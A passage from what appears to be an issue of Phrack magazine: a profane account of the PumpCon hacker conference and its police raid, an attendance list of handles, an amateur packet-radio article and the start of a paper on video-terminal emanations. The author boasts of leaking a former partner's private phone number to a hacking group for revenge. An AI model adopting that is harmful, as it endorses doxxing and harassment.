  6904. he had better things to do than drive a few miles across town to say
  6905. hello.  Remind me to reciprocate at HoHo Con.)
  6906.  
  6907. I was immediately pulled away by GrayAreas and Ophie, who both bestowed
  6908. upon me warnings of impending doom.  Ophie relayed that The Wing had
  6909. told her the previous night that he was going to come to the con and
  6910. "get me."
  6911.  
  6912. GrayAreas informed me that an unscrupulous character had been
  6913. asking for me earlier.  After she described him, it was obvious that
  6914. Rogue Agent had made it to the con.  (Unscrupulous...haha)
  6915.  
  6916. Up in my room, I dove into my bag of medical goods and felt pity upon
  6917. myself.  Congested, contagious, feverish and now being stalked by
  6918. some unknown person.  Great.  I never much paid any heed to the threats
  6919. given by unknown typists over the net, as people's bravado multiplies
  6920. exponentially in direct proportion to the distance they are separated
  6921. behind a phone or computer screen.  During the week prior to the con
  6922. I had been threatened by at least 2 different people under a variety of
  6923. nicks and addresses.  One promised to crack me over the head with a bat.
  6924.  
  6925. I figured with my luck, being sick, this would be the ONE time someone
  6926. would make good on such a promise, as my timing and coordination would
  6927. obviously be impaired.  Swell.
  6928.  
  6929. I went on back downstairs to jump in the conversations in the lobby.  The
  6930. group had grown a bit in my absence.  I sat down and began talking to
  6931. Shortwave & C-Curve about ham radio and archaic computer equipment.
  6932. Shortwave offered to send me a Commodore PET to add to the Erik Bloodaxe
  6933. Memorial Computer Archive.  (The EBMCA is a non-profit organization
  6934. devoted to maintaining the history of personal computing.  Our museum
  6935. will open soon.  Hold your breath!)
  6936.  
  6937. I then noticed that it appeared that damn near every IRC denizen from the
  6938. Washington DC area was at this damn con.  (sans KL & Strat, but they
  6939. were to appear the following day.)  A bunch of us took off wandering around
  6940. later on to see what the hell was up at some of the other hotels.
  6941. The area was laid out in such a manner that there were like five hotels
  6942. immediately next door to one another with two cheesy restaurants between
  6943. them.
  6944.  
  6945. We took off to the Knights Inn and ended up hanging out in the parking
  6946. lot staring at the moon, bullshitting about really lame stuff.  While
  6947. hanging out like retards in the near freezing winds, Dark Tangent came
  6948. over and told us that Zar had been thrown off a bus for the 2nd time
  6949. and was stuck in DC and needed someone to pick him up.  No one wanted to
  6950. road trip it to DC since we were all having SOOO much fun freezing our
  6951. asses off, so Zar had to wait it out for the next bus.
  6952.  
  6953. In one room in the Knights Inn a bunch of people were busily smoking
  6954. their brains out.  Their little gathering was dubbed "Hemp-Con."
  6955.  
  6956. Finally, sanity rested upon me and I decided that the cold would not
  6957. help nurse me back to health, so I took off back to my room.  Ophie was
  6958. in the room next door to mine with a bunch of people drinking.  Well,
  6959. I think Ophie was doing most of the drinking actually.  :)
  6960.  
  6961. I wandered in and gave her a hard time about being drunk.  She responded
  6962. by telling everyone in the room intimate details about her marriage
  6963. and her sexual involvement with the entire DC hacker scene.  Then she
  6964. took off all her clothes and ran around throwing Miniature chocolate
  6965. bars at everyone.  I'm making this up, but she probably wouldn't remember.
  6966. it anyway.  Hehe.
  6967.  
  6968. As I went to open my door I noticed that someone had written "DIE NARC"
  6969. on it with a cigarette.  On the floor was the cigarette, a Camel filterless.
  6970. Well, it appeared that The Wing had arrived.  [Oh frabjuous day.  Calloo,
  6971. Callay.  I chortled in my joy.]
  6972.  
  6973. Just as I was about to go to bed, people were banging on my door.  When I
  6974. opened it, it looked as if everyone from Ophie's room had staggered over
  6975. for a visit.  One guy in the back, kinda tall, kinda thin, wearing a purple
  6976. shirt, was smoking a Camel stub.  I smiled a him and said, "How's it going?"
  6977. He seemed a bit put off but said, "Do you know who I am?"  I replied, "Of
  6978. course I do Alan, how's it going?"
  6979.  
  6980. This seemed to piss him off for some reason.
  6981.  
  6982. "You might be all happy tonight, but just wait until tomorrow," he said.
  6983.  
  6984. "Oh?" I replied, "you got something in store for me?  Cool.  Could you
  6985. play those Ken Shulman tapes for the con?"
  6986.  
  6987. (For those of you who don't know, once upon a time, I had a little company
  6988. called Comsec.  One of my partners was Ken Shulman, a rather complex
  6989. new money piece of @#!*.  Well, things didn't work out with us and Ken
  6990. for a number of reasons, so we fired him.  Ken got mad at us.  He tried to
  6991. fuck over each of us in devious little ways.  To get even, I gave his
  6992. private number out to MOD via the MOD information conduit Renegade Hacker.
  6993. One day, "little shulow" was called up by Wing and Corrupt.  According to
  6994. several people, this call was recorded by MOD.  On this now legendary
  6995. tape, allegedly a disgruntled Shulman proceeded to tell MOD the story
  6996. of how we at Comsec were involved in crimes, drugs and were turning in
  6997. everyone to the feds.  This is the same Ken Shulman who lost his BMW to the
  6998. Houston Police when it was found with 400 hits of X in the trunk, and went
  6999. into seclusion.  But I digress.  I've been trying to get a copy of this
  7000. tape for about two years to see if he said anything actionable about
  7001. Comsec, and to it give to the FBI if he may have been interfering with
  7002. an ongoing federal investigation.  Yes, I do hate him.)
  7003.  
  7004. This seemed to make Wing mad too.  I guess I might have spoiled the surprise
  7005. or something.  "I'm not gonna play any tapes so you can sue Shulman."
  7006.  
  7007. "Oh, that's too bad." I said.
  7008.  
  7009. "Well, I just want you to know, that tomorrow when it happens, you'll know,"
  7010. he said.
  7011.  
  7012. "Well, I guess we'll just wait till tomorrow then."
  7013.  
  7014. "Yeah, we will."
  7015.  
  7016. "Yup. I guess we will."
  7017.  
  7018. "You think you're so cool, but YOU'RE A DICK!" he screamed.
  7019.  
  7020. Oh great, this is where I get punched.  "Well, it's nice you have
  7021. your opinions."
  7022.  
  7023. "YOU'RE A FUCKING DICK!"
  7024.  
  7025. Maybe I was supposed to be the one getting mad and doing the punching
  7026. but I wasn't getting anything but tired and was ready to take a shitload
  7027. of aspirin and slam a bottle of night-time cold syrup and antibiotics.
  7028. "Well, I'll see you tomorrow."
  7029.  
  7030. By now, I guess everyone had figured out that there would be no
  7031. bloodsport, so someone grabbed Wing and they left.  Ophie yelled
  7032. after him, "Some people are such assholes."
  7033.  
  7034. "Well, wasn't that fun," I said to those still hanging around.  "But,
  7035. alas, time for me to get some sleep."  I went down to bum some
  7036. aspirin from Noelle and told her the sordid tale, then went back to my room
  7037. and crashed out.
  7038.  
  7039. AND THAT'S THE INFAMOUS ERIKB vs THE WING STORY.  AREN'T YOU EXCITED?
  7040.  
  7041. That night, VaxBuster and others tried to get in the electrical box, but
  7042. were thwarted by a concerned citizen.  "I'M GOING DOWN TO THE FRONT DESK
  7043. RIGHT NOW!"
  7044.  
  7045. Meanwhile, Sabre sat in the cold all night drinking himself into oblivion
  7046. while keeping a sharp, albeit bloodshot, eye out for potential feds.
  7047.  
  7048. The next day everyone congregated in a room at the Red Roof Inn that had
  7049. been rented as the Conference Room.  (How crafty, we'll have it in a
  7050. hotel room, and SAY its a conference room.)
  7051.  
  7052. Everyone piled into this room anxious for everything to begin.  We waited.
  7053. And waited.  And waited.  Several newcomers had arrived such as Strat and
  7054. his woman, Dr. Freeze (who used to be the Wizard 703 of rolodex fame.
  7055. Keep on Phreakin!), and Zar who had arranged to get kicked off of his
  7056. 3rd bus right near the hotel by slamming a 40 and lighting up
  7057. cigarettes right next to the bus driver.
  7058.  
  7059. Finally, after about 7 hours, I figured that maybe I should just go
  7060. say something.  I hopped up and gave a quick and dirty overview of
  7061. commercial packet radio technology.  I talked briefly about RadioMail
  7062. and CDPD, and also talked about EMBARC and demonstrated sucking messages
  7063. out of a Newstream pager.  Then I sent a message from my notebook from ARDIS
  7064. to a Sprintnet gateway, thru an outdial to a dialup to a terminal server
  7065. on the Internet, and from one account mailed myself at RadioMail
  7066. which then sent it back to me on my HP95 over RAM.  I dunno...I thought
  7067. it was cool.
  7068.  
  7069. After speaking, I was presented with an award:  an empty porno video box.
  7070. The buttheads didn't even have the decency to give me the tape!
  7071. I put the bible in it instead and placed it back in a drawer.
  7072.  
  7073. GreyAreas got up next and talked a bit about her magazine and then
  7074. in a heartfelt plea, asked whoever was bothering her to stop.
  7075. Many in the audience seemed indifferent to her cause, which upset
  7076. her greatly.  She had to leave immediately afterwards.  I hope I
  7077. wasn't the only person who felt kind of sorry for her.
  7078.  
  7079. Now, I'm not one to rain on anyone's parade, but kids, fun and games
  7080. on the net are one thing, but the minute you start fucking with people's
  7081. businesses they will go to the FBI.  Remember this.  [Personally,
  7082. I think there are about 4 or 5 specific people on the net who need to
  7083. fucking grow up before they find themselves sharing a cell with Phiber,
  7084. although that seems to be what they want.]
  7085.  
  7086. To be fair, people who decide that they want to get on the net need to
  7087. be reminded that THE NET IS NOT REAL!  THE NET IS NOT REAL LIFE.  IF
  7088. THE NET SCARES YOU OR WORRIES YOU, TURN OFF THE FUCKING COMPUTER!  GO
  7089. HANG OUT ON ANOTHER CHANNEL!  GO PLAY ON A MUD!  GO READ NEWS!  If that
  7090. doesn't placate you, go to AOL.
  7091.  
  7092. Next up was someone I didn't know, and unfortunately didn't meet.
  7093. But his girlfriend was HOT!  [If he's reading this, tell her I said "hi."]
  7094.  
  7095. He gave everyone a rundown of the troubles from last year's Pumpcon.
  7096. I noticed during his recap that the trouble last year didn't really start
  7097. until they all read The Visionary's file.  I suggested that we hold
  7098. a midnight seance and read it aloud so we could all get busted too.
  7099.  
  7100. Ixom finally made it to his own con and said a few syllables about
  7101. the folks still waiting to be sentenced from last year.
  7102.  
  7103. Up last was VaxBuster who talked about the wonderful world of Blue
  7104. Boxing.  Yes, Virginia, there is a way to box.  People are so silly.
  7105. Obviously I'm not the only one who has looked at CCITT manuals and
  7106. knows signalling frequencies in other countries, or who knows about
  7107. the "International Direct" numbers.  Wow.
  7108.  
  7109. After the conference several of us had pizza and got the worst service
  7110. I have ever had in my entire life of dining out.  Grand.  We made up for
  7111. it by amusing ourselves spotting "victims" with laser pointers, laughing
  7112. like idiots as we placed the dots on their foreheads.
  7113.  
  7114. Once we got back from chowing, everyone had already begun drinking.
  7115. People were going off to congregate at the conference room for a central
  7116. party location.  As I was leaving to go over there, The Wing walked up
  7117. to me, and said he needed to talk to me.  We went into my room and
  7118. he said he had heard what GrayAreas said earlier in the day, and he wanted
  7119. to say that it wasn't him.  I told him, he needed to tell her that, and
  7120. not me.
  7121.  
  7122. I went on to tell him that if he wasn't involved in all the crap going on
  7123. all over the net, then I had no problems with him.  I said he had some
  7124. really poor choices in friends in the past, but hopefully he would
  7125. exercise better judgement in the future.
  7126.  
  7127. We all went back over to the conference room.  Wing pulled GrayAreas outside
  7128. to talk to her.  While they were talking, I caught some talk about
  7129. payphones.
  7130.  
  7131. [no names from here on]
  7132.  
  7133. It seems this guy had a lot of phones and several people too off to go
  7134. buy a few.  They ended up at the lamest party in Pennsylvania.  Four
  7135. people and a keg.  The phones allegedly were sold for 75 bucks and
  7136. were still in the box.  Brand new.
  7137.  
  7138. Back at the con, one of the hapless phone buyers decided to take his phone
  7139. up to the conference room to show it off.  Once there, everyone giggled
  7140. and gawked over it, and then he took it back down to put it in a car.  On the
  7141. way there, a cop grabbed him and arrested him.  The cop then searched
  7142. the car he was about to put it in and found some pot and arrested the
  7143. car's owner too and had the car impounded.
  7144.  
  7145. [anonymous portion ends]
  7146.  
  7147. Now the cops converged on the conference room and began hounding people
  7148. in there.  One wonderful cop discovered my Porno-Bible creation and
  7149. screamed at the crowd, "You heathens!  How could you do something like this?
  7150. You people are sick!"
  7151.  
  7152. Ixom, ready for a fight, began yelling at the chief of police over the phone.
  7153. The police chief told him that maybe he would like for the nice officers
  7154. to bring him downtown to go over his complaints.  Ixom decided that
  7155. would not be necessary.
  7156.  
  7157. After the police interaction, people scattered from the conference room
  7158. back to their individual rooms.  No sooner than they got there, the police
  7159. decided to investigate a "few noise complaints" at the Comfort Inn.
  7160. Ophie's room, the Dope Room on the 1st floor and a few others got searched.
  7161.  
  7162. While all of this mayhem was ensuing in the outside world, I was up in my
  7163. little room being interviewed by GrayAreas for her magazine.  This was
  7164. probably the longest interview I've ever done.  I hope I don't turn out
  7165. looking like a bigger fuckhead in it than I already am.
  7166.  
  7167. After the interview, I got the story of all the police interaction from
  7168. the throngs of people who gathered outside my room.  A few people
  7169. remarked, "how come YOUR room didn't get searched?"  I didn't have an
  7170. answer for that, except maybe because it was paid on a corporate AmEx
  7171. and might not have looked like a "hacker" was in there.  (No, it was
  7172. because I work for the government...just ask Agent Steal.  Geez.)
  7173.  
  7174. After this mess I went to bed.  Yup.
  7175.  
  7176. The following morning while waiting to get a table at Denny's, we noticed
  7177. that the old dudes with the beer were going into the "conference room"
  7178. and taking stuff out.  A bunch of the crew ran over there to check it
  7179. out and guess what?  The old guys weren't just any bunch of drunken
  7180. old dudes, they were the Pennsylvania State Police's Computer Crime
  7181. Division.  They had been staking out the conference from the room next
  7182. door and had listened in to everything.  Rad.  Two years and running.
  7183. Maybe next year the CIA and NSA will want to stake it out too.  I can't
  7184. wait.
  7185.  
  7186. Then I went home.
  7187.  
  7188. *******************************************************************************
  7189.  
  7190.                 - Top 10 things learned at PumpCon -
  7191.                            - The Wink -
  7192.  
  7193. 10) Hotel's don't like over 40 people in their lobby
  7194.  
  7195. 9)  Its not Ma'am, its Doris
  7196.  
  7197. 8)  "GrayArea has quite a few gray areas"
  7198.  
  7199. 7)  Greyhound hates Zar
  7200.  
  7201. 6)  Who needs speakers who show up?
  7202.  
  7203. 5)  SnatchBuster !
  7204.  
  7205. 4)  "You heathens, how can you put the Holy Bible in a pornographic
  7206.     movie case !"
  7207.  
  7208. 3)  Geezer Narc !
  7209.  
  7210. 2)  Don't put condor and erikb in the same space
  7211.  
  7212. 1)  Don't carry open payphones around the con
  7213.  
  7214. *******************************************************************************
  7215.  
  7216.                         P U M P  C O N  ][
  7217.  
  7218.                      Informal Attendance List
  7219.  
  7220. <Disclaimer> I cranked this thing out over the weekend, and some people I
  7221. know were there, but I didn't get their names.  Some people might be listed
  7222. twice.  It's up to you to figure it out.
  7223.  
  7224. As we were waiting for people to arrive we came up with a lameness scale.  If
  7225. you got a "+l" that mean you got a lame point for saying someone's real name
  7226. or info.  Basically spouting off real stuff to people who shouldn't hear it.
  7227. Sure it's easy when you all know each other, but if I was really trying I would
  7228. have generated so much real data on people it would be scary.  On the other
  7229. hand if you were real slick and tricky, you got a "+e", or elite point.  As
  7230. more and more people showed up I stopped doing this 'cuz we all broke up and
  7231. only the people I was around would have to suffer the wrath of the +l.  Think
  7232. of it as a security rating.  The more +l the easier it was to get info out of
  7233. people.
  7234.  
  7235. The List is in the order of when I ran into people.  Basically the first half
  7236. is in chronological order, but after that I lost track and got names when I
  7237. could.
  7238.  
  7239.  Grayarea
  7240.  Noe11e (Yes, she exists)
  7241.  Okinawa (+e)
  7242.  Reive (assigned to Fed-Man)
  7243.  Ophie (+l+l+l+l+l+l.. you get the idea)
  7244.  Lgas (+l)
  7245.  Loki (+l, but he was trying hard..)
  7246.  Jello Man
  7247.  Evak
  7248.  CarlCory
  7249.  SubEthan (+l)
  7250.  Bernie S. (+l, Elite handset dude)
  7251.  Jamie
  7252.  DRobinson
  7253.  iXom (5 hours late)
  7254.  Nick-O (+e, worked that stewardess)
  7255.  FreeJack
  7256.  MadCap (With the elite hat)
  7257.  Condor
  7258.  Jay Farnam
  7259.  ShortWave
  7260.  ErikB (+e, good speech)
  7261.  C-Curve (+e)
  7262.  Cuttle Fish
  7263.  Vax Buster (+e+e for protecting personal data, Good speech)
  7264.  Syntor
  7265.  LudiChrist (+l,+e for evading officers)
  7266.  Optic Nerve
  7267.  Scourge (+l)
  7268.  Great One (+l, +e for staying cool at police station)
  7269.  Dave (+l+l, Don't use your real name)
  7270.  Phil (+l+l, what's this, Real Name con?)
  7271.  Juanka (+l This guy was acting strange..)
  7272.  Rogue
  7273.  NtStriker (+e for being shot by the police)
  7274.  Wierdo
  7275.  DreamScriber
  7276.  Randy S. Hacker (+e for cool car and free beer)
  7277.  Count Zero
  7278.  Typhoid Mary (She locked onto TaquilaHeadPaint)
  7279.  Ragent
  7280.  The Wing
  7281.  Stranger (+l for believing NtStriker was shot)
  7282.  RedAlert
  7283.  Zar (+l for getting kicked off three busses)
  7284.  Dr. Freeze
  7285.  Strat
  7286.  Anonymous Caller
  7287.  KL (+e for staying at the Knights Inn)
  7288.  Mad Dog
  7289.  Odd Ball
  7290.  Hoog
  7291.  Decimator (+l, real name)
  7292.  Time Lord (+e, good speech)
  7293.  Albatross
  7294.  Saber
  7295.  Tristan
  7296.  Grimm
  7297.  Male Havoc
  7298.  MrG (+l+l for getting arrested, +e for not narking)
  7299.  The Dark Tangent (+l, for making this list)                              ==Phrack Magazine==
  7300.  
  7301.                  Volume Four, Issue Forty-Four, File 9 of 27
  7302.  
  7303. ****************************************************************************
  7304.  
  7305. The Amateur Radio Packet Network
  7306. by Larry Kollar, KC4WZK
  7307.  
  7308.  ... As a low-orbit satellite comes into range, Jim's system
  7309.  automatically goes into action.  The computer downloads the last
  7310.  half of an image taken by the satellite's CCD camera, the first
  7311.  half having been taken on the previous pass.  That done, the
  7312.  computer gets a list of new files on the satellite's BBS and
  7313.  downloads Jim's email...
  7314.  
  7315. It's legal.
  7316.  
  7317.  ... Her mother is on the phone, but Rhonda accesses the local
  7318.  BBS by radio.  She logs in to read postings from a world-wide
  7319.  network and her email from a penpal in Great Britain...
  7320.  
  7321. It's not Internet.
  7322.  
  7323.  ... 11:30 p.m., and the local conference node is jumping.  Two
  7324.  people were trying to work out a computer problem, when the
  7325.  local expert checked in with some ideas.  Before long, three
  7326.  more people checked in and a freewheeling discussion got under
  7327.  way...
  7328.  
  7329. It's happening now.
  7330.  
  7331. While the Internet has been growing fast and with great hoopla, amateur radio
  7332. operators (or "hams") around the world have been quietly building a network of
  7333. their own -- the Amateur Radio Packet Network.  Like Internet, the packet
  7334. network has a large TCP/IP component and is available to anyone who can get
  7335. access.  Unlike Internet, getting access is very easy for nearly anyone who
  7336. already has a ham license.
  7337.  
  7338. The packet network is rather loosely organized, and is built and maintained by
  7339. volunteer work.  It's basic building block is the LAN (actually a MAN, or Metro
  7340. Area Network, but terminology is never 100% accurate), which are coordinated by
  7341. local or regional clubs.  A LAN occupies a specific radio frequency (or channel,
  7342. if you want to be crude about it :-), usually VHF or UHF, within a given area.
  7343. Individuals and the regional organizations provide links between LANs for
  7344. communications outside the local area.
  7345.  
  7346. LAN operations work much like Ethernet -- your radio waits for the frequency to
  7347. be clear, then transmits a packet.  This allows several connections to run at
  7348. once.  Most packet systems can themselves maintain up to 10 simultaneous
  7349. connections, but this feature is used only rarely.
  7350.  
  7351. ----------------------
  7352. Packet Radio Equipment
  7353. ----------------------
  7354.  
  7355. Hams to want to use packet radio need three pieces of equipment:
  7356.  
  7357. - A radio (of course).  Most LANs are found on the 2-meter band (144-148 MHz,
  7358.   with packet concentrated around 145.0 MHz and 145.6 MHz.  Many hams dedicate
  7359.   older crystal-controlled commercial or ham radios to packet work.
  7360.  
  7361. - A TNC (Terminal Node Controller).  This is an intelligent box that contains a
  7362.   packet modem much like the guts of a landline (telephone) modem, and a micro-
  7363.   computer that handles the network interface.  Other alternatives are
  7364.   available, including a dumb radio modem that plugs into a PC (software on the
  7365.   PC then handles the network interface), and multimode controllers that can
  7366.   handle other digital communication methods popular among hams.  However, most
  7367.   hams use TNCs since they are cheap (just over $100) and readily available.
  7368.  
  7369. - A terminal, or a PC running a terminal or packet program.  Since TNCs are
  7370.   smart devices, a simple terminal or terminal emulator is all that's required:
  7371.   if it has a keyboard, a display, and an RS-232 port, you can use it with a
  7372.   TNC.  However, many features (multiple connections, for example) are more
  7373.   useful if you have a computer running special packet software.
  7374.  
  7375. Currently, most hams use 1200 baud on 2 meters.  This is the lowest (very)
  7376. common denominator in packet radio.  However, large urban areas are starting
  7377. many new LANs in the 420-450 MHz amateur band; most of these use 9600 baud as
  7378. a minimum.  As time goes on, and packet radio becomes more popular, 9600 baud
  7379. will become the entry level.
  7380.  
  7381. When many inter-LAN links use 56K baud, and some go as high as 2M baud, why
  7382. are the vast majority of hams still using 1200 baud?  Part of the answer is
  7383. technical:  to get reliable performance at better than 2400 baud, you have to
  7384. tap into the guts of the radio, bypassing the audio stages for both transmit
  7385. and receive.  The other part is social:  everybody else is using 1200 baud,
  7386. why spend extra money for stuff you can't use?  The technical problem has been
  7387. solved -- you can buy "data radios" in kits and pre-built models that come with
  7388. the audio bypasses already in place -- but it will take a few years or a good
  7389. reason for hams to abandon their old gear and move up.
  7390.  
  7391. --------------------
  7392. Local Communications
  7393. --------------------
  7394.  
  7395. There is lots of local action to be found on the LANs.  People and clubs run
  7396. BBSes, conference nodes, and many personal mailboxes.  Most BBSes are set up so
  7397. they can send email and specified bulletins (equivalent to Usenet newsgroup
  7398. articles) to personal mailboxes during late night hours when usage is light.  A
  7399. ham using this setup simply accesses his personal mailbox to get his feed for
  7400. the day, not worrying about noise and propagation delays.
  7401.  
  7402. In general, a ham who wants to add a component to a LAN just puts it up and
  7403. advertises it on the local BBSes.  For example, a friend in my area recently
  7404. set up a "QUOTES" BBS dedicated to sharing quotes and funny stories.  Perhaps by
  7405. time this issue of Phrack is published, I will have a Xenix system available for
  7406. logins over the air.
  7407.  
  7408. In most areas, the local networks use AX.25 (a subset of X.25 designed by hams
  7409. especially for packet radio), although TCP/IP is getting popular in some places.
  7410. I'll talk more about this later.
  7411.  
  7412.  
  7413. -----------------------
  7414. Linking It All Together
  7415. -----------------------
  7416.  
  7417. A single LAN is useful, but the REAL power comes from hooking them together.
  7418. Linking LANs into a wide-area network gives the Internet its power; so it goes
  7419. with the packet network.  With inter-LAN links, we can send email nationwide
  7420. (and to many foreign countries), post articles (bulletins) for general reading,
  7421. and even make distant keyboard-to-keyboard contacts -- with some limitations.
  7422.  
  7423. So how is it done?  Since many metro areas support a dozen or more LANs, these
  7424. are usually linked together with high-speed UHF equipment using TCP/IP.  An
  7425. Atlanta-based group called GRAPES has developed a 56K bps system; some
  7426. experimental links in the microwave bands run as fast as 2 MEGA bps!
  7427.  
  7428. For long-haul links, many areas rely on HF (shortwave) frequencies.  Since the
  7429. FCC limits HF packet to 300 baud (yes, you read that right -- 300 baud), and the
  7430. HF frequencies are often very noisy, this is a slow and painful process.  The
  7431. amazing thing is not how slow it is, but that it works at all!
  7432.  
  7433. For this reason, many forward-looking hams are turning to packet satellites for
  7434. long-haul links.  The advantages include relatively quiet frequencies, 9600 baud
  7435. data rates, and predictability; the major disadvantage is that there are simply
  7436. not enough satellites to handle all the traffic that needs to be handled -- yet.
  7437. I'll talk more about packet satellites later.
  7438.  
  7439. -------------------------------
  7440. AX.25, TCP/IP, and All the Rest
  7441. -------------------------------
  7442.  
  7443. The packet network grew from a handful of different experiments with radio
  7444. networking, which has left us with several networking protocols.  Far and away
  7445. the most popular protocol is AX.25, which is built into thousands and thousands
  7446. of TNCs and other packet controllers.  AX.25, as implemented in most ham gear,
  7447. offers up to 10 simultaneous connections and the ability to "digipeat" packets.
  7448. Digipeating (DIGItal rePEATING) is one way to extend the range of a packet
  7449. station -- if you can't reach the station you want to talk with directly, you
  7450. can often digipeat through a station between you and the other person.  One
  7451. problem is that you have to manually construct a route each time you want to
  7452. contact a distant station.  The other problem is that the send-acknowledge
  7453. sequence has to run all the way across the link.  Digipeating through more than
  7454. one or two stations is a good way to annoy other LAN users, and unreliable to
  7455. boot.  The connection works as follows:
  7456.  
  7457.                  ---send---\    /-------->
  7458.         station1            digi           station2
  7459.                  <---------/    \-- ack --
  7460.  
  7461. One popular improvement on the digipeater is the K-node, developed by Kantronics
  7462. (a vendor of packet equipment).  The K-node establishes two links -- one between
  7463. you and the node, the other between the node and the other station.  Each link
  7464. has its own send-acknowledge loop, so a problem in one leg of the connection
  7465. doesn't require re-sending packets through the entire end-to-end connection --
  7466. only through the leg where the packet got garbled.  This connection works as
  7467. follows:
  7468.  
  7469.                  ---send---\      /--send-->
  7470.         station1            K-node           station2
  7471.                  <--ack----/      \-- ack --
  7472.  
  7473. The K-node shares one disadvantage with the digipeater -- you still have to
  7474. manually construct your own connection.  This is where the higher-level
  7475. protocols come in.
  7476.  
  7477. I've already mentioned TCP/IP.  Yes, we have it.  The 44.*.*.* network is
  7478. assigned exclusively to amateur packet operations.  The network name is
  7479. "ampr.org."  Since TNCs do not have TCP/IP in ROM, some kind of personal
  7480. computer is required.  Most of them work -- PCs, Macs, Amigas, Ataris all have
  7481. TCP/IP networking software.  If you've ever used the free KA9Q NOS software (or
  7482. one of its derivatives), you have software that was developed by hams for hams.
  7483. TCP/IP lets amateurs create all sorts of interesting experiments, such as
  7484. setting up "wormholes" through the Internet to relay traffic between distant
  7485. LANs.  Some parts of the country have Internet/packet email access as well.
  7486.  
  7487. There are other "smart" networking protocols in wide use.  NET/ROM is one highly
  7488. popular protocol.  Each NET/ROM node keeps a table of nodes heard and how to
  7489. reach each one, eliminating the hassles of manual routing.  One problem with
  7490. NET/ROM is that during band openings, VHF and UHF signals can carry for hundreds
  7491. of miles beyond their normal range.  ("Line of sight?"  Yeah right -- a friend
  7492. of mine in north Georgia has made contacts with people as far away as Lincoln,
  7493. Nebraska on 2 meters using the stuff he carries around in his truck.)  After a
  7494. band opening, NET/ROM nodes find themselves stuffed with faraway nodes that
  7495. they can't hear anymore.
  7496.  
  7497. The phreakers in the audience may find ROSE interesting.  ROSE bases addresses
  7498. on the NANP area code/prefix scheme.  If a person uses ROSE, and you know her
  7499. call sign and phone number, you contact her at the address "<call> VIA AAAPPP."
  7500. Unfortunately, ROSE does not have the widespread use necessary to make it a
  7501. nationwide network.
  7502.  
  7503. There are several other networking protocols in use, such as TheNet and a few
  7504. others.  However, I expect TCP/IP to replace most if not all competing protocols
  7505. in a few years.
  7506.  
  7507. -----------------
  7508. Packet Satellites
  7509. -----------------
  7510.  
  7511. Here's something you won't see on Internet.  Maybe some of Internet's traffic
  7512. goes over satellites, but direct contact?
  7513.  
  7514. Since 1959, amateurs have launched nearly 30 satellites into orbit.  Nearly
  7515. 20 of these are still in service -- and most of them are dedicated at least
  7516. part-time to packet operation.
  7517.  
  7518. >From a user's standpoint, there are two different types of packet satellite --
  7519. one type using 1200 bps FSK (frequency-shift keying) and the other using 9600
  7520. bps FM.  The current population is split, with about a half dozen of each type.
  7521. Most packet satellites, or pacsats, are based on a design from University of
  7522. Surrey in Great Britain -- they're small and lightweight, keeping launch costs
  7523. to a minimum.  Pacsats are always launched as secondary payloads, and often
  7524. ride as ballast to reduce launch costs even further.
  7525.  
  7526. Many pacsats have on-board CCD cameras that can take pictures of Earth or space,
  7527. and make the pictures available for downloading from the on-board BBS.  Other
  7528. pacsats carry equipment that allow them to be switched into a transponder mode,
  7529. such as the Japanese FujiSat that carries SSB and CW (Morse code) contacts on
  7530. Wednesdays, or can even be converted into an FM repeater such as AO-21.
  7531.  
  7532. Some special software has been developed to make the most of the limited
  7533. bandwidth.  For example, pictures can take more time to download than is
  7534. available during a single pass (normally 10-20 minutes), especially if other
  7535. users are sending and downloading other files at the same time.  The software,
  7536. called PB, lets you download and upload as much of a file as possible during
  7537. one pass, then gets the rest of the file on subsequent passes.  Other software
  7538. lets you automate the entire process, so you can get new files as they arrive
  7539. without having to get up early for that 4 a.m. pass.  PB also lets you download
  7540. files by listening in -- if another person is downloading the file you want, you
  7541. can simply listen to the downlink and let PB construct the file for you.  This
  7542. is a good way to save bandwidth; if two people want the same file, only one of
  7543. them has to actually download it.  If there are holes in the file, you can fill
  7544. them in later.
  7545.  
  7546. --------------------------------
  7547. Getting an Amateur Radio License
  7548. --------------------------------
  7549.  
  7550. There are five grades of amateur radio licenses in the U.S.; from lowest to
  7551. highest, they are Novice, Technician General, Advanced, and Extra.  Each grade
  7552. of license has a test on theory and regulations, with a Morse code "element"
  7553. required for several of them.
  7554.  
  7555. The good news is that 99% of what packet radio has to offer is available to the
  7556. Technician.  The better news is that the Technician license, as of January
  7557. 1991, no longer requires you to learn Morse code.  The "codeless Tech" has
  7558. brought a great deal of new blood into ham radio, including many hackers and
  7559. mainstream computer people.
  7560.  
  7561. Study guides are available from Radio Shack and the American Radio Relay League
  7562. (ARRL); the ARRL's guides are the better of the two, in my opinion.  You can get
  7563. ARRL study guides at most ham radio stores or directly from the ARRL.  If you
  7564. want to get a codeless Technician license, you'll need the Novice and the
  7565. Technician study guides.  The material isn't very hard to learn; anyone who can
  7566. navigate the guts of Ma Bell will have no trouble with the Novice or Technician
  7567. exams. :-)
  7568.  
  7569. The ARRL can also provide you with a free schedule of exams in your area.  The
  7570. FCC some years ago turned over all testing to accredited amateur groups, so you
  7571. should be able to find an exam at a time and place convenient to you.  Many
  7572. other ARRL services are available through an Internet mail server; send mail
  7573. to info-server@arrl.org containing the line "send index" in the body of your
  7574. message.
  7575.  
  7576. If there's any bad news, it's that a group of diehards can't stand the idea of
  7577. a code-free ham license.  Some of these folks will go out of the way to hassle
  7578. code-free hams.  Fortunately, most of them are afraid of computers and don't
  7579. do packet.  Other things to watch out for -- the FCC frowns on profanity,
  7580. intentional jamming, and encrypted data sent over the air.  A small price to
  7581. pay, in my opinion, for the opportunity to build and explore a worldwide network
  7582. without the Secret Service breathing down your neck.
  7583.  
  7584. -- end --
  7585.  
  7586.  
  7587.                               ==Phrack Magazine==
  7588.  
  7589.                  Volume Four, Issue Forty-Four, File 10 of 27
  7590.  
  7591. ****************************************************************************
  7592.  
  7593. [Editor's Note:  This file is reprinted with permission of InterPact
  7594.  Press.  The actual document contains many pictures, charts, and tables
  7595.  that due to our format, we were unable to reproduce.  We encourage the
  7596.  reader to contact InterPact Press at 813-393-6600 and order a hard copy
  7597.  of the document for $25.00]
  7598.  
  7599. -------------------------------------------------------------------------------
  7600.  
  7601. Protective Measures Against Compromising Electro Magnetic Radiation
  7602. Emitted by Video Display Terminals
  7603.  
  7604. by Professor Erhart Moller
  7605. University of Aachen, Aachen, Germany
  7606.  
  7607.  
  7608. 0. Introduction
  7609.  
  7610. Compromising electromagnetic radiation emitted by machinery or
  7611. instruments used in data processing or communication engineering can be
  7612. received, decoded and recorded even across large distances.  It is also
  7613. possible to recognize the data or information which was processed and
